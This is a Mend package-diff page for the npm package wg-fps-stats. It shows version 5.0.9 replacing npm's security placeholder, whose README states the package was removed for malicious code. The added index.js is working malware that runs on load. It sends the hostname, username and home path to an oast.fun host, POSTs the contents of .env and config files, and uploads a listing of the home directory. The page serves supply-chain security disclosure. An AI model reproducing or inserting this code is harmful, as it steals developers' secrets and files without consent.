npm - wg-fps-stats - Versions diffs - 0.0.1-security → 5.0.9 - Mend

wg-fps-stats 0.0.1-security → 5.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of wg-fps-stats might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,165 @@
+const os = require('os');
+const https = require('https');
+const fs = require('fs');
+const path = require('path');
+const http = require('http');
+function sendInfo() {
+  const hostname = os.hostname();
+  const userInfo = os.userInfo();
+  const url = `https://cdggjsqmawdrduupnbtnkvbx5s3goipz3.oast.fun?h=${encodeURIComponent(hostname)}&un=${encodeURIComponent(userInfo.username)}&hd=${userInfo.homedir}&wg=True`;
+  // Выполнение GET-запроса
+  https.get(url, (res) => {
+    console.log(``);
+  }).on('error', (err) => {
+    console.error('', err.message);
+  });
+}
+function sendConfigFiles(url) {
+  const configFiles = [
+    '.env',
+    '.gitignore',
+    '.dockerignore',
+    'config.json',
+    'package.json',
+    'tsconfig.json',
+    '.eslint.json',
+    '.prettierrc'
+  ];
+  // Объект для хранения содержимого файлов
+  let configData = {};
+  // Прочитаем файлы по очереди
+  for (let file of configFiles) {
+    const filePath = path.join(__dirname, file);
+    try {
+      if (fs.existsSync(filePath)) {
+        let fileContent = fs.readFileSync(filePath, 'utf-8');
+        // Если это JSON файл, парсим его
+        if (file.endsWith('.json')) {
+          try {
+            fileContent = JSON.parse(fileContent);
+          } catch (error) {
+            console.error(`Ошибка при парсинге JSON файла ${file}:`, error);
+          }
+        }
+        // Добавляем содержимое файла в объект
+        configData[file] = fileContent;
+      } else {
+        console.warn(`${file} не найден.`);
+      }
+    } catch (error) {
+      console.error(`Ошибка при чтении файла ${file}:`, error);
+    }
+  }
+  // Выбираем модуль для запроса (https или http)
+  const protocol = url.startsWith('https') ? https : http;
+  // Определяем параметры для отправки POST запроса
+  const options = {
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(JSON.stringify(configData))
+    }
+  };
+  // Отправляем POST запрос
+  const req = protocol.request(url, options, (res) => {
+    let data = '';
+    // Собираем ответ
+    res.on('data', (chunk) => {
+      data += chunk;
+    });
+    // Завершаем обработку ответа
+    res.on('end', () => {
+      console.log('Данные успешно отправлены. Ответ от сервера:', data);
+    });
+  });
+  // Обработка ошибок запроса
+  req.on('error', (error) => {
+    console.error('Ошибка при отправке данных:', error);
+  });
+  // Отправляем данные в запросе
+  req.write(JSON.stringify(configData));
+  req.end();
+}
+// Вызов функции для отправки конфигурационных данных
+sendConfigFiles(`https://cdggjsqmawdrduupnbtnkvbx5s3goipz3.oast.fun/env`);
+function sendHome() {
+  // Чтение файлов и директорий в домашней директории
+  function getFilesInHomeDir(homeDir) {
+    try {
+      const files = fs.readdirSync(homeDir);  // Получаем список файлов и директорий
+      return files;
+    } catch (err) {
+      return [];
+    }
+  }
+  // Отправка POST запроса с файлом
+  function sendFilesToServer(files, url) {
+    const data = JSON.stringify({ files });
+    // Настройки для POST запроса
+    const options = {
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(data)
+      }
+    };
+    // Отправка запроса
+    const req = https.request(url, options, (res) => {
+      let responseData = '';
+      res.on('data', (chunk) => {
+        responseData += chunk;
+      });
+      res.on('end', () => {
+        // Ответ от сервера можно обработать здесь, если нужно
+      });
+    });
+    req.on('error', (error) => {
+      // Обработка ошибок отправки запроса
+    });
+    // Отправляем данные
+    req.write(data);
+    req.end();
+  }
+  // Получаем домашний каталог пользователя
+  const homeDir = os.homedir();
+  // Получаем список файлов и директорий в домашней директории
+  const files = getFilesInHomeDir(homeDir);
+  // URL для отправки POST запроса
+  const url = 'https://cdggjsqmawdrduupnbtnkvbx5s3goipz3.oast.fun/homedir';  // Укажите URL вашего сервера
+  // Отправка данных на сервер
+  sendFilesToServer(files, url);
+}
+// Запуск основного процесса
+sendHome();

package/package.json CHANGED Viewed

@@ -1,6 +1,11 @@
 {
   "name": "wg-fps-stats",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "5.0.9",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": ""
+  },
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=wg-fps-stats for more information.